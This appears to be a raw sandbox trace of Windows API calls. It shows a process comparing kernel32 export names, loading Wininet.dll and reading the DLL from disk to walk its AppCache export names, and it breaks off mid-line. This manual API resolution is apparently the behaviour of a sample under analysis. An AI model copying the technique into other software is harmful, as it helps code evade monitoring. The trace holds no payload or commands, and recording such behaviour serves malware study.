[0109.413] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddRefActCtx") returned 1 [0109.413] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddRefActCtxWorker") returned 1 [0109.413] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddResourceAttributeAce") returned 0 [0109.413] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AcquireSRWLockExclusive") returned 1 [0109.413] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AcquireSRWLockShared") returned 1 [0109.413] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="ActivateActCtx") returned 1 [0109.413] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="ActivateActCtxWorker") returned 1 [0109.413] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddAtomA") returned 1 [0109.413] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddAtomW") returned 1 [0109.413] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddConsoleAliasA") returned 1 [0109.413] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddConsoleAliasW") returned 1 [0109.413] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddDllDirectory") returned 1 [0109.413] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0109.413] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddLocalAlternateComputerNameA") returned 1 [0109.413] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddLocalAlternateComputerNameW") returned 1 [0109.413] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddRefActCtx") returned 1 [0109.413] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddRefActCtxWorker") returned 1 [0109.413] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddResourceAttributeAce") returned 1 [0109.413] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddSIDToBoundaryDescriptor") returned 0 [0109.413] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AcquireSRWLockExclusive") returned 1 [0109.413] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AcquireSRWLockShared") returned 1 [0109.413] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="ActivateActCtx") returned 1 [0109.413] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="ActivateActCtxWorker") returned 1 [0109.413] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddAtomA") returned 1 [0109.414] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddAtomW") returned 1 [0109.414] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddConsoleAliasA") returned 1 [0109.414] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddConsoleAliasW") returned 1 [0109.414] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddDllDirectory") returned 1 [0109.414] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0109.414] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddLocalAlternateComputerNameA") returned 1 [0109.414] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddLocalAlternateComputerNameW") returned 1 [0109.414] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddRefActCtx") returned 1 [0109.414] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddRefActCtxWorker") returned 1 [0109.414] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddResourceAttributeAce") returned 1 [0109.414] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddSIDToBoundaryDescriptor") returned -1 [0109.414] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddScopedPolicyIDAce") returned 0 [0109.414] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AcquireSRWLockExclusive") returned 1 [0109.414] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AcquireSRWLockShared") returned 1 [0109.414] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="ActivateActCtx") returned 1 [0109.414] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="ActivateActCtxWorker") returned 1 [0109.414] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddAtomA") returned 1 [0109.414] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddAtomW") returned 1 [0109.414] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddConsoleAliasA") returned 1 [0109.414] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddConsoleAliasW") returned 1 [0109.414] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddDllDirectory") returned 1 [0109.414] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0109.414] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddLocalAlternateComputerNameA") returned 1 [0109.414] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddLocalAlternateComputerNameW") returned 1 [0109.414] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddRefActCtx") returned 1 [0109.414] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddRefActCtxWorker") returned 1 [0109.415] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddResourceAttributeAce") returned 1 [0109.415] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddSIDToBoundaryDescriptor") returned -1 [0109.415] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddScopedPolicyIDAce") returned 1 [0109.415] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddSecureMemoryCacheCallback") returned 0 [0109.415] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AcquireSRWLockExclusive") returned 1 [0109.415] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AcquireSRWLockShared") returned 1 [0109.415] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="ActivateActCtx") returned 1 [0109.415] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="ActivateActCtxWorker") returned 1 [0109.415] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddAtomA") returned 1 [0109.415] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddAtomW") returned 1 [0109.415] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddConsoleAliasA") returned 1 [0109.415] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddConsoleAliasW") returned 1 [0109.415] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddDllDirectory") returned 1 [0109.415] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0109.415] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddLocalAlternateComputerNameA") returned 1 [0109.415] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddLocalAlternateComputerNameW") returned 1 [0109.415] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddRefActCtx") returned 1 [0109.415] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddRefActCtxWorker") returned 1 [0109.415] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddResourceAttributeAce") returned 1 [0109.415] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0109.416] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddScopedPolicyIDAce") returned 1 [0109.416] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddSecureMemoryCacheCallback") returned 1 [0109.416] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddVectoredContinueHandler") returned 1 [0109.416] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddVectoredExceptionHandler") returned 1 [0109.416] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AdjustCalendarDate") returned 0 [0109.416] lstrcmpA (lpString1="AllocConsole", lpString2="AcquireSRWLockExclusive") returned 1 [0109.416] lstrcmpA (lpString1="AllocConsole", lpString2="AcquireSRWLockShared") returned 1 [0109.416] lstrcmpA (lpString1="AllocConsole", lpString2="ActivateActCtx") returned 1 [0109.416] lstrcmpA (lpString1="AllocConsole", lpString2="ActivateActCtxWorker") returned 1 [0109.416] lstrcmpA (lpString1="AllocConsole", lpString2="AddAtomA") returned 1 [0109.416] lstrcmpA (lpString1="AllocConsole", lpString2="AddAtomW") returned 1 [0109.416] lstrcmpA (lpString1="AllocConsole", lpString2="AddConsoleAliasA") returned 1 [0109.416] lstrcmpA (lpString1="AllocConsole", lpString2="AddConsoleAliasW") returned 1 [0109.416] lstrcmpA (lpString1="AllocConsole", lpString2="AddDllDirectory") returned 1 [0109.416] lstrcmpA (lpString1="AllocConsole", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0109.416] lstrcmpA (lpString1="AllocConsole", lpString2="AddLocalAlternateComputerNameA") returned 1 [0109.416] lstrcmpA (lpString1="AllocConsole", lpString2="AddLocalAlternateComputerNameW") returned 1 [0109.416] lstrcmpA (lpString1="AllocConsole", lpString2="AddRefActCtx") returned 1 [0109.416] lstrcmpA (lpString1="AllocConsole", lpString2="AddRefActCtxWorker") returned 1 [0109.416] lstrcmpA (lpString1="AllocConsole", lpString2="AddResourceAttributeAce") returned 1 [0109.416] lstrcmpA (lpString1="AllocConsole", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0109.416] lstrcmpA (lpString1="AllocConsole", lpString2="AddScopedPolicyIDAce") returned 1 [0109.416] lstrcmpA (lpString1="AllocConsole", lpString2="AddSecureMemoryCacheCallback") returned 1 [0109.416] lstrcmpA (lpString1="AllocConsole", lpString2="AddVectoredContinueHandler") returned 1 [0109.417] lstrcmpA (lpString1="AllocConsole", lpString2="AddVectoredExceptionHandler") returned 1 [0109.417] lstrcmpA (lpString1="AllocConsole", lpString2="AdjustCalendarDate") returned 1 [0109.417] lstrcmpA (lpString1="AllocConsole", lpString2="AllocConsole") returned 0 [0109.417] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AcquireSRWLockExclusive") returned 1 [0109.417] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AcquireSRWLockShared") returned 1 [0109.417] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="ActivateActCtx") returned 1 [0109.417] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="ActivateActCtxWorker") returned 1 [0109.417] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddAtomA") returned 1 [0109.417] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddAtomW") returned 1 [0109.417] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddConsoleAliasA") returned 1 [0109.417] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddConsoleAliasW") returned 1 [0109.417] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddDllDirectory") returned 1 [0109.417] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0109.417] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddLocalAlternateComputerNameA") returned 1 [0109.417] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddLocalAlternateComputerNameW") returned 1 [0109.417] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddRefActCtx") returned 1 [0109.417] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddRefActCtxWorker") returned 1 [0109.417] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddResourceAttributeAce") returned 1 [0109.417] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0109.417] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddScopedPolicyIDAce") returned 1 [0109.417] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddSecureMemoryCacheCallback") returned 1 [0109.418] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddVectoredContinueHandler") returned 1 [0109.418] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddVectoredExceptionHandler") returned 1 [0109.418] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AdjustCalendarDate") returned 1 [0109.418] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AllocConsole") returned -1 [0109.418] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AllocateUserPhysicalPages") returned 0 [0109.418] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AcquireSRWLockExclusive") returned 1 [0109.418] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AcquireSRWLockShared") returned 1 [0109.418] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="ActivateActCtx") returned 1 [0109.418] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="ActivateActCtxWorker") returned 1 [0109.418] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddAtomA") returned 1 [0109.418] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddAtomW") returned 1 [0109.418] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddConsoleAliasA") returned 1 [0109.418] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddConsoleAliasW") returned 1 [0109.418] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddDllDirectory") returned 1 [0109.418] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0109.418] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddLocalAlternateComputerNameA") returned 1 [0109.418] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddLocalAlternateComputerNameW") returned 1 [0109.418] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddRefActCtx") returned 1 [0109.418] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddRefActCtxWorker") returned 1 [0109.418] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddResourceAttributeAce") returned 1 [0109.418] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0109.418] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddScopedPolicyIDAce") returned 1 [0109.418] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddSecureMemoryCacheCallback") returned 1 [0109.418] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddVectoredContinueHandler") returned 1 [0109.418] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddVectoredExceptionHandler") returned 1 [0109.418] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AdjustCalendarDate") returned 1 [0109.418] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AllocConsole") returned -1 [0109.419] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AllocateUserPhysicalPages") returned 1 [0109.419] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AllocateUserPhysicalPagesNuma") returned 0 [0111.273] GetProcessHeap () returned 0x590000 [0111.273] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5bc5d0 | out: hHeap=0x590000) returned 1 [0111.274] GetProcessHeap () returned 0x590000 [0111.274] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x10) returned 0x5a9320 [0111.274] LoadLibraryA (lpLibFileName="Wininet.dll") returned 0x7ffc51070000 [0111.286] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0111.286] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0111.286] GetModuleFileNameA (in: hModule=0x7ffc51070000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\Wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll")) returned 0x1f [0111.286] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\Wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0111.287] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0111.287] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0111.287] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=2647552) returned 1 [0111.287] GetProcessHeap () returned 0x590000 [0111.287] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x286600) returned 0x40c3040 [0111.296] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0111.296] ReadFile (in: hFile=0x140, lpBuffer=0x40c3040, nNumberOfBytesToRead=0x286600, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x40c3040*, lpNumberOfBytesRead=0x14f5a4*=0x286600, lpOverlapped=0x0) returned 1 [0111.820] CloseHandle (hObject=0x140) returned 1 [0111.820] lstrcmpA (lpString1="AppCacheCheckManifest", lpString2="AppCacheCheckManifest") returned 0 [0111.820] lstrcmpA (lpString1="AppCacheCloseHandle", lpString2="AppCacheCheckManifest") returned 1 [0111.820] lstrcmpA (lpString1="AppCacheCloseHandle", lpString2="AppCacheCloseHandle") returned 0 [0111.821] lstrcmpA (lpString1="AppCacheCreateAndCommitFile", lpString2="AppCacheCheckManifest") returned 1 [0111.821] lstrcmpA (lpString1="AppCacheCreateAndCommitFile", lpString2="AppCacheCloseHandle") returned 1 [0111.821] lstrcmpA (lpString1="AppCacheCreateAndCommitFile", lpString2="AppCacheCreateAndCommitFile") returned 0 [0111.821] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheCheckManifest") returned 1 [0111.821] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheCloseHandle") returned 1 [0111.821] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheCreateAndCommitFile") returned 1 [0111.821] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheDeleteGroup") returned 0 [0111.821] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheCheckManifest") returned 1 [0111.821] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheCloseHandle") returned 1 [0111.821] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheCreateAndCommitFile") returned 1 [0111.821] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheDeleteGroup") returned 1 [0111.821] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheDeleteIEGroup") returned 0 [0111.821] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheCheckManifest") returned 1 [0111.821] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheCloseHandle") returned 1 [0111.821] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheCreateAndCommitFile") returned 1 [0111.821] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheDeleteGroup") returned 1 [0111.821] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheDeleteIEGroup") returned 1 [0111.821] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheDuplicateHandle") returned 0 [0111.821] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheCheckManifest") returned 1 [0111.822] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheCloseHandle") returned 1 [0111.822] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheCreateAndCommitFile") returned 1 [0111.822] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheDeleteGroup") returned 1 [0111.822] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheDeleteIEGroup") returned 1 [0111.822] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheDuplicateHandle") returned 1 [0111.822] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheFinalize") returned 0 [0111.822] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheCheckManifest") returned 1 [0111.822] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheCloseHandle") returned 1 [0111.822] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0111.822] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheDeleteGroup") returned 1 [0111.822] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheDeleteIEGroup") returned 1 [0111.822] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheDuplicateHandle") returned 1 [0111.822] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheFinalize") returned 1 [0111.822] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheFreeDownloadList") returned 0 [0111.822] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheCheckManifest") returned 1 [0111.822] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheCloseHandle") returned 1 [0111.822] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0111.823] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheDeleteGroup") returned 1 [0111.823] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheDeleteIEGroup") returned 1 [0111.823] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheDuplicateHandle") returned 1 [0111.823] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheFinalize") returned 1 [0111.823] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheFreeDownloadList") returned 1 [0111.823] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheFreeGroupList") returned 0 [0111.823] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheCheckManifest") returned 1 [0111.823] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheCloseHandle") returned 1 [0111.823] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheCreateAndCommitFile") returned 1 [0111.823] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheDeleteGroup") returned 1 [0111.823] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheDeleteIEGroup") returned 1 [0111.823] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheDuplicateHandle") returned 1 [0111.823] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFinalize") returned 1 [0111.823] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFreeDownloadList") returned 1 [0111.823] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFreeGroupList") returned 1 [0111.823] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFreeIESpace") returned 0 [0111.823] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheCheckManifest") returned 1 [0111.824] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheCloseHandle") returned 1 [0111.824] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheCreateAndCommitFile") returned 1 [0111.824] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheDeleteGroup") returned 1 [0111.824] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheDeleteIEGroup") returned 1 [0111.824] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheDuplicateHandle") returned 1 [0111.824] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFinalize") returned 1 [0111.824] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeDownloadList") returned 1 [0111.824] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeGroupList") returned 1 [0111.824] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeIESpace") returned 1 [0111.824] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeSpace") returned 0 [0111.824] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheCheckManifest") returned 1 [0111.825] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheCloseHandle") returned 1 [0111.825] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0111.825] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheDeleteGroup") returned 1 [0111.825] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheDeleteIEGroup") returned 1 [0111.825] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheDuplicateHandle") returned 1 [0111.825] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFinalize") returned 1 [0111.825] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeDownloadList") returned 1 [0111.825] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeGroupList") returned 1 [0111.825] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeIESpace") returned 1 [0111.825] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeSpace") returned 1 [0111.826] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheGetDownloadList") returned 0 [0111.826] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheCheckManifest") returned 1 [0111.826] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheCloseHandle") returned 1 [0111.826] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheCreateAndCommitFile") returned 1 [0111.826] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheDeleteGroup") returned 1 [0111.826] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheDeleteIEGroup") returned 1 [0111.826] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheDuplicateHandle") returned 1 [0111.826] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFinalize") returned 1 [0111.826] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeDownloadList") returned 1 [0111.826] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeGroupList") returned 1 [0111.826] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeIESpace") returned 1 [0111.826] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeSpace") returned 1 [0111.826] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheGetDownloadList") returned 1 [0111.826] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheGetFallbackUrl") returned 0 [0111.826] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheCheckManifest") returned 1 [0111.826] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheCloseHandle") returned 1 [0111.826] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0111.826] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheDeleteGroup") returned 1 [0111.826] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheDeleteIEGroup") returned 1 [0111.826] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheDuplicateHandle") returned 1 [0111.826] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFinalize") returned 1 [0111.826] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeDownloadList") returned 1 [0111.826] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeGroupList") returned 1 [0111.827] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeIESpace") returned 1 [0111.827] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeSpace") returned 1 [0111.827] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheGetDownloadList") returned 1 [0111.827] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheGetFallbackUrl") returned 1 [0111.827] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheGetGroupList") returned 0 [0111.827] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheCheckManifest") returned 1 [0111.827] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheCloseHandle") returned 1 [0111.827] lstrcmpA 